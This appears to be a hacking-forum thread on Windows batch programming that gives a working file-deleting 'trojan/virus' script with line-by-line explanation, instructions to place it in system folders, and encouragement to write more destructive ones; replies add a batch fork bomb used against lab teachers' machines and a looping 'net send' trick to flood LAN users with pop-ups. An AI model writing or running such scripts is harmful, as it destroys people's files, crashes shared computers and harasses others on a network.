Thread: Batch file programming Share/Save - My123World.Com!

Batch file programming

Batch file programming is quite an interesting one. From creating short tools to effective virus, I found this language very playful Basically this language works on windows platform. Batch file is created by using text editors like notepad etc. It is a text file containing a series of commands intended to be executed by the command interpreter. Similar to job control language and other systems on mainframe and minicomputer systems, batch files were added to ease the work required for certain regular tasks by allowing the user to set up a batch script to automate many commands. I am attaching the link below to Mr. Premkumar.S book "Btach file programming tutorial". After reading the tutorial, you'll hopefully learn this language as it is very easy and effective.

The three great essentials to achieve anything worth while are: Hard work, Stick-to-itiveness, and Common sense. - Thomas A. Edison
    __________________________________________________ _____________________

Our very basic trojan/virus in batch :)

Lets have our first very basic trojan/worm in batch. Here I wont be explaining much. You should read the book whose link has been provided above. This very basic batch virus will try to delete files and display a message as soon it is executed. I will also explain the various commands used here.

Open notepad and type in the following code:

@Echo off
    Del *.exe
    Del *.com
    Del *.dll
    Del *.doc
    Echo **Owned By LOXians**
    Mkdir C:\Hacked !

Using 'Save as' save the file with any name and extension .bat. Like "virus.bat".

Copy the virus in juicy folders like the C:/Windows or system32 .Execute the virus to check the aftermath

WARNING: Analysis of worms and malwares should always be done in Virtual Machines. Testing them on your own machine can cause severe damage. I have installed a copy of windows xp for testing purpose on VMware. It is advisable to have a guest OS for testing purpose rather than testing it on your own machine

Here an explanation of the above virus:

@Echo off - Turns echo off so user doesn't know what happens
    Del *.exe - Deletes all files in the current directory with the .exe
    extension
    Del *.com - Deletes all files in the current directory with the .com
    extension
    Del *.dll - Deletes all files in the current directory with the .dll
    extension
    Del *.doc - Deletes all files in the current directory with the .doc
    extension
    Echo **Owned By LOXians** - Displays **Owned By LOXians**
    Mkdir C:\Hacked ! - Creates the directory Hacked ! on the C: drive
    ---------------------------------------------------------------------------------

As far as you move in this language, you can make more destructive torjans/virus for windows platform. Thanks for reading
    The three great essentials to achieve anything worth while are: Hard work, Stick-to-itiveness, and Common sense. - Thomas A. Edison

... I am no Expert b0nd.g4h@gmail.com b0nd's Avatar
    Its fun as well some times irritating your friends with simple batch programs , like forming a loop to open command prompt every time the loop executes.
    TFS Prashant.
    [*] To follow the path: look to the master, follow the master, walk with the master, see through the master,
    ------> become the master!!! <------
    [*] Everyone has a will to WIN but very few have the will to prepare to WIN
    [*] Invest yourself in everything you do, there's fun in being serious

Welcome bro ..this language is quite funny

Garage Member
    Its a really great scripting language. I too like doing weird stuff by using this language. But it has some limitations too.
    be a R3b3l not a P3bbl3...
    To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.

Super Commando Dhruv abhaythehero's Avatar
    Blog Entries
    I often use fork bomb in batch to frustrate my lab teachers.
    They are like .. "how is the AV not detecting something "

Code:
    :s
    start %0
    goto :s
    In the world of 0s and 1s, are you a zero or The One !

Garage Member
    if the machines on LAN have messenger service running then chatting can be done by using net send command. But we can also irritate other users on LAN by using net send * command in an infinite loop.
    Every time a pop up comes up on victim's screen.
    be a R3b3l not a P3bbl3...
    To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.

yep...batch programs can make user angry when executed on LAN PCs...!